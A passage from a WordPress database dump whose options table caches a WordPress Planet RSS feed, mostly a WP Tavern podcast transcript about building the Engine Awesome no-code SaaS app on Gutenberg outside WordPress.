License\";s:18:\"is_near_expiration\";b:0;s:14:\"days_to_expire\";i:53;s:10:\"is_expired\";b:0;s:8:\"is_valid\";b:1;s:22:\"is_past_renewal_period\";b:0;s:9:\"is_legacy\";b:1;s:12:\"is_perpetual\";b:0;s:9:\"max_sites\";s:9:\"unlimited\";s:12:\"active_sites\";i:7;s:15:\"remaining_seats\";s:9:\"unlimited\";s:20:\"is_multisite_allowed\";b:1;}}s:6:\"errors\";a:0:{}s:6:\"status\";s:9:\"valid_key\";s:4:\"meta\";a:0:{}s:5:\"strat\";O:63:\"Gravity_Forms\\Gravity_Forms\\Transients\\GF_WP_Transient_Strategy\":0:{}}\";','no'),(18875,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1682421491','no'),(18876,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(12517,'niteoCS_font_content[hardwork]','Montserrat','yes'),(19088,'_transient_timeout_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1681962328','no'),(19089,'_transient_feed_mod_9bbd59226dc36b9b26cd43f15694c5c3','1681919128','no'),(19090,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1681962328','no'),(19091,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"WPTavern: #72 – Steve Bruner and Timothy Jacobs on Using Gutenberg Outside of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=143647\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"https://wptavern.com/podcast/72-steve-bruner-and-timothy-jacobs-on-using-gutenberg-outside-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:56034:\"Transcript<div>\n<p>[00:00:00] Nathan Wrigley: Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case using Gutenberg to build the Awesome Engine SaaS app.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast player of choice, or by going to WPTavern.com forward slash feed forward slash podcast. And you can copy that URL into most podcasts players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m very keen to hear from you, and hopefully get you all your idea featured on the show had to WPTavern.com forward slash contact forward slash jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today we have Steve Bruner and Timothy Jacobs.</p>\n\n\n\n<p>Steve has been active in the WordPress community for the past 17 years. He&#8217;s a WordPress developer, co organizer of the WordPress NYC meetup, and has organized many word camps in New York City.</p>\n\n\n\n<p>Timothy is a WordPress core committer for the REST API, and has been a WordPress developer for over 10 years. At StellarWP he leads development of the iThemes security plugin.</p>\n\n\n\n<p>What brings them together is that they&#8217;re both founders of a SaaS app called Engine Awesome, where Steve is the CEO, and Timothy is the CTO.</p>\n\n\n\n<p>What has this got to do with WordPress, you might ask? Well, they&#8217;re here today to talk about Gutenberg, but not how you might expect. It&#8217;s Gutenberg outside of WordPress, but Gutenberg, nonetheless. Like all of WordPress, Gutenberg is open source. You are free to download it, modify it and use it in whatever way you like.</p>\n\n\n\n<p>When Steve and Timothy began working on their new project and needed a way for their clients to interact with it, they found Gutenberg was the perfect tool for the job.</p>\n\n\n\n<p>We talk about what benefits they&#8217;ve gained by using Gutenberg. How it saved them time, and how it&#8217;s fast becoming a stable and mature product which is easy for non-technical users to understand.</p>\n\n\n\n<p>We get into the details of which parts of Gutenberg they used, and which parts were not suitable for their app. They&#8217;ve been building their own blocks, which work well in the UI, but which are more suited to the kinds of data that they&#8217;re gathering.</p>\n\n\n\n<p>The discussion then moves on to what Awesome Engine actually does. It&#8217;s an app builder in which you can construct your own data containers and theme them so that it displays in any way you like. They tell us about the features, which they have so far, as well as the items which are on their roadmap.</p>\n\n\n\n<p>Towards the end we talk about their commitment to continue contributing back to the Gutenberg project, and how they feel that it&#8217;s in everyone&#8217;s interest if the project gets better from any updates that they have made.</p>\n\n\n\n<p>If you&#8217;re looking to build your own SaaS app, or you&#8217;re just curious about how Gutenberg is being deployed outside of WordPress, this podcast is for you.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading to WPTavern.com forward slash podcast, where you&#8217;ll find the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Steve Bruner and Timothy Jacobs.</p>\n\n\n\n<p>I am joined on the podcast today by two gentlemen. I&#8217;m joined by Steve Bruner and Timothy Jacobs. Hello.</p>\n\n\n\n<p>[00:04:23] Steve Bruner: Hey Nathan. Nice to meet you.</p>\n\n\n\n<p>[00:04:24] Timothy Jacobs: Hey.</p>\n\n\n\n<p>[00:04:25] Nathan Wrigley: Steve. Firstly, did I pronounce your surname correctly?</p>\n\n\n\n<p>[00:04:29] Steve Bruner: You did absolutely.</p>\n\n\n\n<p>[00:04:30] Nathan Wrigley: First try. Yeah, that&#8217;s great. Well, thank you for joining us on the podcast today. We&#8217;re going to be talking about something which we literally haven&#8217;t covered in any way, shape, or form at all. We&#8217;ve talked endlessly about Gutenberg and the Block Editor, and blocks and patterns and all of that. But we&#8217;re kind of staying away from that, despite the fact we&#8217;re going to be talking about Gutenberg. Because we&#8217;re going to be talking about an app which has been built on top of Gutenberg, but really not that connected to WordPress. So buckle up. This will be an interesting episode.</p>\n\n\n\n<p>We like to orientate the listeners as to who you are so that when they&#8217;re listening, they know that you are an authority on what you&#8217;re talking about. So can I take you in turn? Can I go Steve, first? Would you mind giving us your little potted history of who you are, what you do for a living, where you live, and what your relationship has been with WordPress?</p>\n\n\n\n<p>[00:05:18] Steve Bruner: Sure. So back in my previous life I was in like marketing and sales. I embraced technology back then and using spreadsheets and eventually Microsoft Access, I was able to do more than anyone else on my team, right? I could do 10, 20 times the amount of work, just writing macros in Excel or, do database config in Microsoft Access.</p>\n\n\n\n<p>And I loved playing with technology and started playing with HTML, and a friend of mine about 17 years ago, 18 years ago, introduced me to WordPress, said, this is pretty cool, you may want to check it out. And I really loved it. It was easy and it was hackable and it was a lot of fun.</p>\n\n\n\n<p>Eventually somebody asked me to build them a website. Somebody else offered to pay me to build them a website. And that just grew over the years until I became a full-time, I guess, solopreneur. I have an agency, but I do hire out contractors on a regular basis. I have relationships with many contractors who I&#8217;ve been using now for over a decade.</p>\n\n\n\n<p>I also ended up back then taking over the WordPress meetup in New York City. It was about 400 members, now it&#8217;s 9,000. That really gave me a good introduction to WordPress. It introduced me to a lot of people, and I learned. In the very beginning of a meetup, for those of you who are trying to start one, if you don&#8217;t have somebody who will present, you are the presenter.</p>\n\n\n\n<p>So for the first year, year and a half, I presented every month, third Tuesday of the month. Did that for a year and a half until we started getting more presenters in. So that grew and yeah, I&#8217;m a full-time WordPress developer now.</p>\n\n\n\n<p>[00:06:56] Nathan Wrigley: Isn&#8217;t it curious how, if you have been using the internet, let&#8217;s say, and building websites for anything like 20, 30 plus years, you kind of more or less fell into this job. I&#8217;ve yet to come across anybody of my age, shall we say, who&#8217;s been doing this for that length of time who sort of decided from the outset, that&#8217;s what I&#8217;m going to do.</p>\n\n\n\n<p>The story is always the same. I was doing something else and then I discovered HTML and played with CSS and realized, oh, I could actually make a living with this. What fun.</p>\n\n\n\n<p>[00:07:23] Steve Bruner: That&#8217;s exactly right. The fact that WordPress is open source. You can run it locally. I learned how to code, and this is not an uncommon story, right? I learned how to code by changing code in WordPress. By commenting things out and changing things, and just seeing how it worked.</p>\n\n\n\n<p>[00:07:39] Nathan Wrigley: Yeah. A verified tinkerer. It sounds like a man after my own heart. Okay, so let&#8217;s move on to Timothy. Timothy, same question really. Give us your background story and particularly your relationship with WordPress.</p>\n\n\n\n<p>[00:07:52] Timothy Jacobs: For sure. I&#8217;m also based in the New York City area, so you can guess how I met Steve at the WordPress New York City Meetup Group, which I also help co-organize. But aside from that I&#8217;ve been working with WordPress now for about ish 10 years or so. My day job is I work over at StellarWP on iThemes security. So I&#8217;m the lead developer over there.</p>\n\n\n\n<p>But I also have yeah been involved with the WordPress community for a bit. I&#8217;m right now a WordPress core committer. I help work with the REST API in WordPress Core. And then also try and, you know, work with the Gutenberg team as well on REST API things and bringing the two together and helping everything work.</p>\n\n\n\n<p>[00:08:29] Nathan Wrigley: Well thank you. At the outset of this podcast it might be useful if you are listening to this and you&#8217;re anywhere near a computer. Just pause for a moment and go to the URL engineawesome.com. It is exactly as you&#8217;d imagine. There&#8217;s no funky spelling there, engineawesome.com.</p>\n\n\n\n<p>Go and have a poke around because I feel that the context that you&#8217;ll get from doing that will put you in a good position to enjoy this podcast episode more. So come back and we&#8217;ll get on with the ride. So first of all, whoever wants to answer the question, what is Engine Awesome? We should probably clear that up straight away.</p>\n\n\n\n<p>[00:09:03] Steve Bruner: Great. So yeah, I can answer that. Engine Awesome is a SaaS application, and for those interested it is built using Gutenberg, but Gutenberg using Laravel, not WordPress. But it&#8217;s a SaaS application that allows you to build applications for your business with absolutely no code, just using blocks. You could build your own CRM. You can build an order management system, a donation system, project tracking, to-dos. Anything you want in the config that you need.</p>\n\n\n\n<p>[00:09:33] Nathan Wrigley: So the ability to do that in SaaS software, there&#8217;s probably a multitude of apps that we could go to that offer, I guess, something fairly similar. You know a no code tool which allows you to build something custom. But the unique bit which has got you on this podcast today is the fact that you&#8217;ve chosen to do that outside of WordPress, but still using Gutenberg.</p>\n\n\n\n<p>And I want to know why. I want to know why was it that you decided to take that on board? I can imagine there&#8217;s a whole bunch of reasons, but they would be guesses. So let&#8217;s delve right into</p>\n\n\n\n<p>[00:10:09] Timothy Jacobs: Yeah, so I think one of the big things is that the user experience that the block editor provides, while there&#8217;s always places that it can be improved, is really excellent. There are so many tools out there where the first years of their development are, how do we build a good UI for dragging things onto the screen and making it look like you would expect it to look.</p>\n\n\n\n<p>And how do we, you know, have settings that adjust things and make tweaks and have visual changes? And how do I navigate to different areas, and how do I present blocks of content? I think WordPress, the block editor in Gutenberg, isn&#8217;t really the only block based system that&#8217;s out there. Lots of different tools have come to realize the power of the block.</p>\n\n\n\n<p>But the block editor in Gutenberg being open source, lets us have tons of customization ability. So it really gave us a great headstart for building out an application user interface, where we could get right down to the meat of it, instead of worrying about all of the bits that go into building a WYSIWYG block editor interface.</p>\n\n\n\n<p>[00:11:13] Nathan Wrigley: It&#8217;s almost like the use case for using WordPress to build a website in a way, isn&#8217;t it? Because it does a bunch of the heavy lifting for you. You don&#8217;t have to invent all the user permissions yourself, and write all of that code. You can get yourself off to a flying start by implementing something which is freely available and ready to roll.</p>\n\n\n\n<p>[00:11:31] Timothy Jacobs: Exactly. It gives you that same kind of headstart. And it also provides like a great prototype experience. The first prototype that we built out was just by building some custom blocks in a WordPress, Gutenberg system. Not even with a whole Laravel side of things. It&#8217;s just a great place to prototype.</p>\n\n\n\n<p>[00:11:48] Nathan Wrigley: So Steve, I don&#8217;t know if you have anything to add to that, but basically why Gutenberg? If you&#8217;ve got a different answer than Timothy&#8217;s, go for it.</p>\n\n\n\n<p>[00:11:56] Steve Bruner: Tim&#8217;s the CTO, so his is a little more technical. Mine would be a little more business oriented, I guess. First off, the Gutenberg UI is proven, right. It&#8217;s a proven UI that works well, and millions of people and millions of websites use it every day to build websites. So not having to deal with that, not having to work on a UI and go through the whole trial and error process really was appealing to us.</p>\n\n\n\n<p>Gutenberg gave us, we probably would&#8217;ve taken two years, three years to build this out if it wasn&#8217;t for Gutenberg. So having that head start, having a UI that&#8217;s proven, that works. And if you&#8217;re coming from the WordPress world, you&#8217;ll feel natural. You&#8217;ll feel comfortable in Engine Awesome, because it&#8217;s Gutenberg, right? We have some custom blocks and some custom workflows, but at the heart of it is Gutenberg, and you will, you&#8217;ll feel very comfortable using it.</p>\n\n\n\n<p>[00:12:48] Nathan Wrigley: So given that Gutenberg itself has been how to describe it? It&#8217;s been tumultuous over the last few years. You know, there&#8217;s been a lot of changes, a lot of rapid iterations. I guess that&#8217;s slowed down a little bit more recently when the whole project seemed to move over to full site editing and all of that. Is that a concern of yours? Have you frozen your version of Gutenberg in time? Or are you keeping up with the very latest and greatest that that project offers?</p>\n\n\n\n<p>[00:13:13] Timothy Jacobs: We are keeping very up to date. I think we are one version of Gutenberg behind usually. And that&#8217;s where we like to keep it at. But yeah, just a couple of weeks ago, we added support for fixed positioning. Which was a feature that the main Gutenberg team had just introduced. So we see that the, like, iteration speed of Gutenberg is a benefit.</p>\n\n\n\n<p>A big thing is that as Gutenberg is maturing, and now we&#8217;re seeing Gutenberg with the isolated block editor project and coming to the wordpress.org forums. And of course what Automattic is doing with Tumblr, that the core WordPress Gutenberg packages, while they are moving very fast and you do have to keep up with them, they are kind of stable enough that you can build on top of them in this way.</p>\n\n\n\n<p>And they have to be so that those projects don&#8217;t just keep breaking. And so WordPress.org doesn&#8217;t just keep breaking. While it is not as stable, let&#8217;s say as WordPress Core pre 5.0, and just building on top of the WordPress Core PHP. I think it&#8217;s stable enough to build on top of, for sure.</p>\n\n\n\n<p>[00:14:19] Nathan Wrigley: Did the nature of what you were trying to achieve, and we can dig into exactly what it is that you are solving in a little while, but did the paradigm of blocks fit pretty neatly? In other words can you. atomize your workflow inside of Awesome Engine into a collection of blocks basically? Drag in blocks, reposition blocks, fill in data into blocks, and that&#8217;s essentially what the app is doing.</p>\n\n\n\n<p>[00:14:43] Timothy Jacobs: Yeah, I think so. At its core in Engine Awesome, each field, each bit of data that you&#8217;re putting into your, let&#8217;s say CRM or invoice management system, each one of those fields is a block that you create. So starting from that level of, hey, we have a block, which is a field that data can be entered into. And it doesn&#8217;t just look like, let&#8217;s say a plain text field, it looks something a bit more of a rich application user interfaced.</p>\n\n\n\n<p>The field and the block being like that common low level bit that we build on top of. Yeah, it does make, I think the block-based paradigm a good fit. There are some struggles with a block-based paradigm, and achieving some more complex layouts where things aren&#8217;t just neatly stacked in rows and stacked in columns, like a grid.</p>\n\n\n\n<p>But that is something that&#8217;s getting more and more possible to with Gutenberg every few releases. But I do think that the block-based nature, being able to map over to every block as a field did make it a good match, of philosophically in that sense.</p>\n\n\n\n<p>[00:15:45] Nathan Wrigley: Yeah, right from the outset. Matt Mullenweg ages ago, I don&#8217;t exactly know when, he had this, what felt like a really almost crystal ball gazing idea that Gutenberg as the editor would become almost synonymous with entering data across the whole internet. It would become something which was used everywhere.</p>\n\n\n\n<p>Gutenberg itself would become bigger than WordPress and all of that kind of thing. Do you see this? Do you see people doing what you are doing out there? In other words, does the Gutenberg interface, is it increasingly cropping up in places just like Engine Awesome?</p>\n\n\n\n<p>[00:16:20] Timothy Jacobs: I&#8217;m not sure if I&#8217;ve seen many cases. There are some that are out there. There is a Laraberg, as I believe the combination of names and how they landed on that one of combining Laravel plus Gutenberg, more for like a page editor context. The same way that is used in WordPress Core.</p>\n\n\n\n<p>As well as I believe there&#8217;s a Drupal integration. And I think a couple of other things. Of course, there&#8217;s the isolated block editor project and what Tumblr is doing. I haven&#8217;t seen a lot of people though that are doing it to the degree that we are doing it, in terms of, hey, we&#8217;re letting you build an application as opposed to letting you design a webpage.</p>\n\n\n\n<p>And so I don&#8217;t think we are there yet. But I think the stabilization over the past year has made it more of a possibility for projects who are looking to adopt Gutenberg in that way absolutely can, and I think it&#8217;s something worth looking into.</p>\n\n\n\n<p>[00:17:10] Nathan Wrigley: How much of the core Gutenberg blocks do you bring along? And how much of it is bespoke work for your application? I&#8217;m presuming, I mean, you alluded to it earlier. I think you said you&#8217;ve got some of your own custom blocks in there. Do you bring almost everything along for the ride, including, I don&#8217;t know, the Vimeo embed block or whatever it may be? Or do you pull out a certain amount and keep a certain amount only?</p>\n\n\n\n<p>[00:17:32] Timothy Jacobs: Yes, this is actually, it&#8217;s a really interesting question in terms of how functionality in Gutenberg these days gets divided. So we don&#8217;t bring in any core WordPress Gutenberg blocks. But what we are able to do is, as we&#8217;ve had the introduction of global styles in the full site editor experience. There&#8217;s been more of a separation of, what are things that are really blocks and what are things that are settings that your blocks can opt in to.</p>\n\n\n\n<p>So for instance in Engine Awesome, you can use the margin tools, and the padding tools, and the sizing tools, and the colors, and the text sizes. All of these different systems. And the way that we support that in Engine Awesome is we just say in our block.json, hey, we want this feature. Gutenberg, render me the UI for it. Build me the styles. Save all of it to the block metadata information.</p>\n\n\n\n<p>Gutenberg, you handle all of that. And what I&#8217;ll do is I&#8217;ll render the part that you see in the canvas, the actual block UI. But core Gutenberg is able to handle those types of controls. So that&#8217;s where we&#8217;ve really made the delineation, is that we don&#8217;t use the core blocks, but we use all of the features that the core blocks use. And are able to pull them in without having to copy thousands of lines of code. So we for instance, have a text block and a group block, and they&#8217;re a few dozen lines of code that are really just implementing the WordPress core APIs around layout and around rich text.</p>\n\n\n\n<p>[00:19:09] Nathan Wrigley: Yeah, it&#8217;s interesting because I&#8217;m looking at your homepage now and there&#8217;s a video on there showing what is obviously to me, the Gutenberg interface. I guess to your customers maybe they&#8217;ll recognize it as that, maybe not. But it shows the inserter, the panel on the left opening up, and it really does look the same.</p>\n\n\n\n<p>And so I made the mistake of thinking they were core blocks because many of them map really similarly. You know, you&#8217;ve got a text field and then you&#8217;ve got a URL and the iconography looks remarkably similarly. You haven&#8217;t really tweaked that in any way. It really, really looks like the interface right down to the colors and everything is exactly the same. Black text, black icons, blue buttons, looks similar. That&#8217;s a curious choice that you decided not to fiddle with the design of it.</p>\n\n\n\n<p>[00:19:54] Timothy Jacobs: Yeah, I think the design of the block editor, like Steve was mentioning, is really well proven. And I think there are places where maybe in the future that we do more customization, based off of how our users are going to be using Engine Awesome. And the differences between the block editor in WordPress Core for designing pages and the block editor in Engine Awesome for designing applications.</p>\n\n\n\n<p>But I don&#8217;t think we wanted to take an approach of, well, let&#8217;s just redesign it for the sake of redesigning it without knowing hey, here are these specific UX benefits that we want to change and we want to improve.</p>\n\n\n\n<p>The other aspect of it, to be honest, is that some of these components are harder to tweak than others. Like the inserter, for instance, is a very complex component. So we don&#8217;t want to just say like, okay, let&#8217;s rip it all apart. That&#8217;s one of the aspects where I think you can get into a little bit of trickiness with the rapid pace of Gutenberg development. Is that if you rip everything and everything and everything down to its very bare bone bits, then it is a lot harder to stay up to date with Gutenberg and to be on the latest versions. It makes each upgrade a little bit more of a chore. Whereas for us upgrading Gutenberg isn&#8217;t very difficult.</p>\n\n\n\n<p>[00:21:15] Nathan Wrigley: So I guess if you&#8217;re a listener to this podcast, the chances are that you&#8217;ve played with Gutenberg in the past and you&#8217;ve experienced how it works and this whole process in Engine Awesome will be really familiar to you. But it also raises the question, you know, in WordPress there&#8217;s a whole ton of different blocks out there now. If you, you know, you can go to the internet and download thousands, possibly tens of thousands of different blocks. And, so you are using that block methodology in your application.</p>\n\n\n\n<p>It feels like we&#8217;ve sidestep the, the most important question, which is what on earth, what an earth does this SaaS platform actually do? So it might be a good idea to bring Steve back in at this point and ask what is Engine Awesome? What is it doing?</p>\n\n\n\n<p>[00:21:56] Steve Bruner: Yeah. So like I mentioned before, I&#8217;ve been running a small business for almost 20 years. Full-time for, you know, close to 10. And I&#8217;ve tried every piece of software out there to help you run your business, right? I&#8217;ve tried every CRM. I&#8217;ve tried every project management tool and to-do list and anything you can imagine, I&#8217;ve tried.</p>\n\n\n\n<p>And to be honest with you, I haven&#8217;t loved any of &#8217;em. And anybody I&#8217;ve spoken to has said the same thing. Usually when you try these out of the box solutions, you feel like you&#8217;re overpaying for a product where you&#8217;re only using 50, 60% of the features. And they keep loading it up with more features and they keep raising the price.</p>\n\n\n\n<p>With Engine Awesome you get to build exactly what you want. You build the CRM that you want in the way you work. The way your team works. The way your business works. We have had clients that have taken paper forms that they&#8217;ve used in their business and replicated them in Engine Awesome. And their employees just log in and they know how to use it. There&#8217;s nothing strange here anymore. They see the same form they&#8217;ve been using for years, it&#8217;s just a digital version. So training comes down and training costs come down.</p>\n\n\n\n<p>Now, there are other no-code platforms out there. We realize that there are others that are doing this. Our goal is to make it simple. To make it really, really simple for you to get your application up, right. Tim and I always talk about getting our clients up and running in minutes, not months. You don&#8217;t have to know anything about databases to use Engine Awesome. You don&#8217;t have to know about key fields and indexing fields. You don&#8217;t have to know how to build relationships. You don&#8217;t have to do any of that stuff. Engine Awesome takes care of it for you very easily. Just drag and drop some blocks, check a box, press save, and you&#8217;re ready to go.</p>\n\n\n\n<p>[00:23:55] Nathan Wrigley: I&#8217;m seeing when I&#8217;m on your homepage, I&#8217;m seeing what looked like the two UIs. I&#8217;m seeing the Gutenberg UI, which obviously has a purpose, but I&#8217;m also seeing like another UI where I don&#8217;t know what&#8217;s going on there. Is it, do you have a UI to build the blocks themselves and then they&#8217;re created inside of Gutenberg to drop in whatever data it is that you need to put into that particular block?</p>\n\n\n\n<p>[00:24:18] Timothy Jacobs: Yeah, so we have two different base points. They&#8217;re both Gutenberg. But the first step of building your Engine Awesome application is deciding what fields that you want to support. So what data you want to collect. And this is just dragging from the inserter, a URL, or a name, or a color, and bringing them into a separate editor where you see all the list of fields that you&#8217;ve created for this particular, what we call an object type. For WordPress users it would kind of be most analogous to a custom post type.</p>\n\n\n\n<p>And so your contact, for instance, might have a name field, a phone, an address, things like that. Those fields that you define when you&#8217;re editing your object type, make up the inserter, make up the block library when you then edit your layouts. So you first define your kind of data that you&#8217;re looking to collect. And then you can define as many different user interfaces that you want to show that data or collect that data. And Steve can give some good examples of how that interface building portion happens.</p>\n\n\n\n<p>[00:25:19] Steve Bruner: Yeah, so a lot of our clients come from using spreadsheets, for instance. Just giant spreadsheets. 30 columns, thousands of rows. And it&#8217;s really easy for them to work with Engine Awesome, right. So as Tim mentioned, first they define their object and then they literally are transferring those fields from a spreadsheet to Engine Awesome using the blocks.</p>\n\n\n\n<p>Then they go and start creating their layouts. And the layouts are, they could be forms, right? Where you&#8217;re entering data. They could be tables where you are viewing data. They can be queries where you&#8217;re searching for data. And those layouts also are conditional.</p>\n\n\n\n<p>They can change based upon data that&#8217;s entered. So, for instance, if you have quote that you provided through an Engine Awesome system, and that quote is in maybe an open status, you will see certain fields that are there. But once that quote gets changed to an approved status, those fields will be locked, right?</p>\n\n\n\n<p>You&#8217;re not changing the quote after it&#8217;s been approved. So fields are locked. Nobody on your team can enter data or edit data anymore. And then you can move through a process. And again, I just want to reiterate, that is not a set process in Engine Awesome, that&#8217;s a process that somebody would&#8217;ve built, right? Everything is custom.</p>\n\n\n\n<p>So those layouts, change in Engine Awesome. One other UI I guess that we have. We recently brought in the full site editing experience, or I guess the full, Tim can talk more about this, but the full site editing UI as the actual application UI. So when you are building your object and building your layouts, you see the inserter, the settings, Gutenberg like everyone is really familiar with it. But when you&#8217;re using the application, when your team is using the application, when they&#8217;re in the field or in the office, we are using the full site editing experience with the full site editing menu. And Tim, maybe you want to elaborate on that?</p>\n\n\n\n<p>[00:27:20] Nathan Wrigley: Yeah, please.</p>\n\n\n\n<p>[00:27:21] Timothy Jacobs: Yeah, so you can kind of see this, if you go into our post, Engine Awesome has a new look. And you can kind of see that delineation there. Basically the Gutenberg team introduced a really fantastic collection of navigation elements. And so we were able to use those to say, here&#8217;s how you navigate between different views, between different object types, between different sets of data. And use that navigation experience that the core Gutenberg team provided.</p>\n\n\n\n<p>[00:27:48] Nathan Wrigley: Yeah, I will link to that post. But anybody listening, there&#8217;s a blog post. Currently it&#8217;s linked in the footer, but I imagine over time it will disappear from the footer of the main homepage. It&#8217;s called Engine Awesome has a new look and you can see the site editor panel on the left and all of that. Yeah, that&#8217;s a really interesting implementation.</p>\n\n\n\n<p>So you build out the structure of the data you want to consume, you then have the option to display that. Presumably there must be a whole piece of making that data interact with other data points.</p>\n\n\n\n<p>So, you know, you just mentioned that something is marked as approved. So certain fields get locked up. But presumably there are relationships, child, parent relationships, one-to-one, and so on and so forth, that bind the data together. Otherwise, you&#8217;re looking at a spreadsheet, aren&#8217;t you, really? So there must be something more in here.</p>\n\n\n\n<p>[00:28:35] Timothy Jacobs: Exactly. So when you edit your object type, you can set up a relationship between another bit of data, and then when you do that by dragging a block. So you&#8217;ll see in your inserter, for instance, let&#8217;s say that you are editing a contacts object type, and you already have a company&#8217;s object type set up.</p>\n\n\n\n<p>The only thing that you need to do is drag a block that says that this contact has one company and then Engine Awesome takes care of the rest. And so then when you&#8217;re building out a layout, let&#8217;s say for a company, you can easily display a list of all of the contacts that are associated with that company or vice versa.</p>\n\n\n\n<p>When you&#8217;re editing a contact, you can say, hey, here&#8217;s a snapshot of information about this company. Maybe their address, their website, a photo of them. Just to give that contextual information. So you can set up all of those object types and all of those relationships just by dragging a block into the block editor.</p>\n\n\n\n<p>[00:29:29] Nathan Wrigley: Steve, it sounded like you wanted to chip in there.</p>\n\n\n\n<p>[00:29:31] Steve Bruner: I was just going to give you a couple of use cases so you can get a good understanding of how people are using Engine Awesome. So recently a non-profit provided us a spreadsheet, a thousand rows, 26 or 30 columns, and they were tracking their donors in it. And it really is not the best way to do that. In five minutes, and I really mean this, I&#8217;m not joking.</p>\n\n\n\n<p>Five minutes, maybe six, on a Zoom call with this prospective customer, I built an application for him where he was able to enter donors and then keep a record, a log of donations. See those donations, filter those donations, and get a good understanding of what&#8217;s going on. So it was really really quick and is going to change the way he does his job and his team&#8217;s job, and everyone&#8217;s just going to be, everyone&#8217;s life is going to be easier.</p>\n\n\n\n<p>We have a home cleaning service, a residential home cleaning service. Tim has done a great video, you&#8217;ll find it on our YouTube channel about how to build a service business application, and in 30 minutes, and this is a live video that Tim did, and you&#8217;ll go through it. Tim is not going quickly at all.</p>\n\n\n\n<p>But in 30 minutes he built an application that tracks this home cleaning services clients. The jobs they do. Their team members and their teams. They go into people&#8217;s homes, they bring up Engine Awesome on their phone. They view their jobs. They mark their job cleaning when they&#8217;re starting to clean, and then they go through this whole process.</p>\n\n\n\n<p>And when they&#8217;re done, they mark it done. Eventually they&#8217;re going to be taking credit cards using Engine Awesome. So, we have a Zapier integration where when the job is done, the client will get an email automatically with a payment link. And this is changing her business, right? Right now, she deals with cash or check or Zelle. Sometimes people forget. And it&#8217;s just making her life much easier.</p>\n\n\n\n<p>Even something crazy like a marketing company that has displays in Home Depot stores. They are going to be doing a test in a couple of hundred Home Depot stores. And they built a UI in Engine Awesome that tracks stores and products and promotions and using our web hooks and API, they&#8217;re going to be pushing data to those stores, to those displays, and managing it all in Engine Awesome.</p>\n\n\n\n<p>So ideas that we never even thought of, people are starting to use Engine Awesome for some really, really creative ideas. You know, at the core of it, Tim and I really are passionate about helping businesses be more productive every day. And I think these use cases give a good, broad example of that.</p>\n\n\n\n<p>[00:32:06] Nathan Wrigley: I don&#8217;t know if either of you have ever used a piece of software called Airtable? But Airtable came around, I don&#8217;t know, maybe five or six years ago and it felt like a really, quite an interesting 